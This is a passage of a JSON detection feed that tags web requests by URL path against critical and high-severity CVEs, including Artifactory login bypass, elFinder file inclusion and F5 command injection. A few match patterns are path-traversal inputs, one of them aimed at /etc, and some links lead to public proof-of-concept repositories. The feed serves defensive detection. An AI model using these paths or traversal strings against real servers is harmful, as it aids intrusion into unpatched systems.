Password","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/ui/auth/login","reference_urls":["https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes","https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory","https://nvd.nist.gov/vuln/detail/CVE-2019-17444","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2019-9733","tag_type":"cve","title":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/artifactory/ui/auth/login","reference_urls":["http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html","https://www.ciphertechs.com/jfrog-artifactory-advisory/","https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6","https://nvd.nist.gov/vuln/detail/CVE-2019-9733","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2021-20837","tag_type":"cve","title":"MovableType - Remote Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/mt/mt-xmlrpc.cgi","reference_urls":["https://nemesis.sh/posts/movable-type-0day/","https://github.com/ghost-nemesis/cve-2021-20837-poc","https://twitter.com/cyber_advising/status/1454051725904580608","https://nvd.nist.gov/vuln/detail/CVE-2021-20837","http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html"]},{"tag_id":"CVE-2021-29441","tag_type":"cve","title":"Nacos <1.4.1 - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/nacos/v1/cs/configs","reference_urls":["https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/","https://github.com/alibaba/nacos/issues/4701","https://github.com/advisories/GHSA-36hp-jr8h-556f","https://github.com/alibaba/nacos/pull/4703","https://github.com/bakery312/Vulhub-Reproduce"]},{"tag_id":"CVE-2021-3378","tag_type":"cve","title":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/Config/SaveUploadedHotspotLogoFile","reference_urls":["https://erberkan.github.io/2021/cve-2021-3378/","https://github.com/erberkan/fortilogger_arbitrary_fileupload","http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html","http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html","https://github.com/SYRTI/POC_to_review"]},{"tag_id":"CVE-2021-46424","tag_type":"cve","title":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/images/icons_title.gif","reference_urls":["https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt","https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing","http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html","https://nvd.nist.gov/vuln/detail/CVE-2021-46424","https://github.com/ARPSyndicate/cvemon"]},{"tag_id":"CVE-2022-0948","tag_type":"cve","title":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js","reference_urls":["https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576","https://wordpress.org/plugins/woc-order-alert/","https://plugins.trac.wordpress.org/changeset/2707223","https://nvd.nist.gov/vuln/detail/CVE-2022-0948","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2022-26960","tag_type":"cve","title":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc","reference_urls":["https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html","https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db","https://www.synacktiv.com/publications.html","https://nvd.nist.gov/vuln/detail/CVE-2022-26960","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2022-29081","tag_type":"cve","title":"Zoho ManageEngine - Access Control Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/x/..//RestAPI/LicenseMgr","reference_urls":["https://www.tenable.com/security/research/tra-2022-14","https://www.manageengine.com/privileged-session-management/advisory/cve-2022-29081.html","https://nvd.nist.gov/vuln/detail/CVE-2022-29081"]},{"tag_id":"CVE-2022-29383","tag_type":"cve","title":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/scgi-bin/platform.cgi","reference_urls":["http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383","https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383","https://nvd.nist.gov/vuln/detail/CVE-2022-29383","https://github.com/badboycxcc/Netgear-ssl-vpn-20211222","https://www.netgear.com/about/security/"]},{"tag_id":"CVE-2022-31814","tag_type":"cve","title":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/pfblockerng/www/index.php","reference_urls":["https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/","https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html","https://github.com/EvergreenCartoons/SenselessViolence","https://nvd.nist.gov/vuln/detail/CVE-2022-31814","http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html"]},{"tag_id":"CVE-2023-0777","tag_type":"cve","title":"modoboa  2.0.4 - Admin TakeOver","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/accounts/login","reference_urls":["https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/","http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html","https://github.com/modoboa/modoboa/commit/47d17ac6643f870719691073956a26e4be0a4806","https://github.com/7h3h4ckv157/7h3h4ckv157"]},{"tag_id":"CVE-2023-2648","tag_type":"cve","title":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/inc/jquery/uploadify/uploadify.php","reference_urls":["https://github.com/sunyixuan1228/cve/blob/main/weaver.md","https://nvd.nist.gov/vuln/detail/CVE-2023-2648","https://vuldb.com/?ctiid.228777","https://vuldb.com/?id.228777","https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648"]},{"tag_id":"CVE-2023-6875","tag_type":"cve","title":"WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/wp-json/post-smtp/v1/connect-app","reference_urls":["https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Mobile/includes/rest-api/v1/rest-api.php#L60","https://plugins.trac.wordpress.org/changeset/3016051/post-smtp/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk","https://www.wordfence.com/threat-intel/vulnerabilities/id/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve","https://nvd.nist.gov/vuln/detail/CVE-2023-6875","https://github.com/UlyssesSaicha/CVE-2023-6875"]},{"tag_id":"CVE-2023-6895","tag_type":"cve","title":"Hikvision IP ping.php - Command Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/php/ping.php","reference_urls":["https://vuldb.com/?ctiid.248254","https://vuldb.com/?id.248254","https://github.com/tanjiti/sec_profile","https://github.com/wy876/POC","https://github.com/xingchennb/POC-"]},{"tag_id":"CVE-2024-38289","tag_type":"cve","title":"TurboMeeting - Boolean-based SQL Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/as/wapi/vmp","reference_urls":["https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v"]},{"tag_id":"CVE-2025-25570","tag_type":"cve","title":"Vue Vben Admin - Default Credentials","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/basic-api/login","reference_urls":["https://github.com/vbenjs/vue-vben-admin","https://doc.vvbin.cn/"]},{"tag_id":"CVE-2025-48827","tag_type":"cve","title":"vBulletin 5.0.0-6.0.3 - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/ajax/api/ad/wrapAdTemplate","reference_urls":["https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce","https://nvd.nist.gov/vuln/detail/CVE-2025-48827"]},{"tag_id":"CVE-2025-67303","tag_type":"cve","title":"ComfyUI-Manager < 3.38 - Configuration Overwrite","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/userdata/ComfyUI-Manager%2Fconfig.ini","reference_urls":["https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md","https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md","https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md"]},{"tag_id":"CVE-2019-20224","tag_type":"cve","title":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/pandora_console/index.php","reference_urls":["https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/","https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9","https://nvd.nist.gov/vuln/detail/CVE-2019-20224","https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view","https://pandorafms.com/downloads/solved-pandorafms-742.mp4"]},{"tag_id":"CVE-2022-41800","tag_type":"cve","title":"F5 BIG-IP Appliance Mode - Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/mgmt/shared/iapp/rpm-spec-creator","reference_urls":["https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis","https://support.f5.com/csp/article/K97843387","https://support.f5.com/csp/article/K13325942","https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/","https://nvd.nist.gov/vuln/detail/cve-2022-41800"]},{"tag_id":"CVE-2023-29084","tag_type":"cve","title":"ManageEngine ADManager Plus - Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/j_security_check","reference_urls":["https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/","https://community.grafana.com/t/release-notes-v6-3-x/19202","http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html","https://manageengine.com","https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html"]},{"tag_id":"CVE-2026-48313","tag_type":"cve","title":"ColdFusion - Path Traversal","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/CFIDE/main/ide.cfm","reference_urls":["https://labs.watchtowr.com/its-37oc-and-all-we-can-think-about-is-coldfusion-adobe-coldfusion-security-bulletin-apsb26-68-cve-bonanza/"]}],"data_as_of":"2026-08-29T10:22:47.427191+00:00"}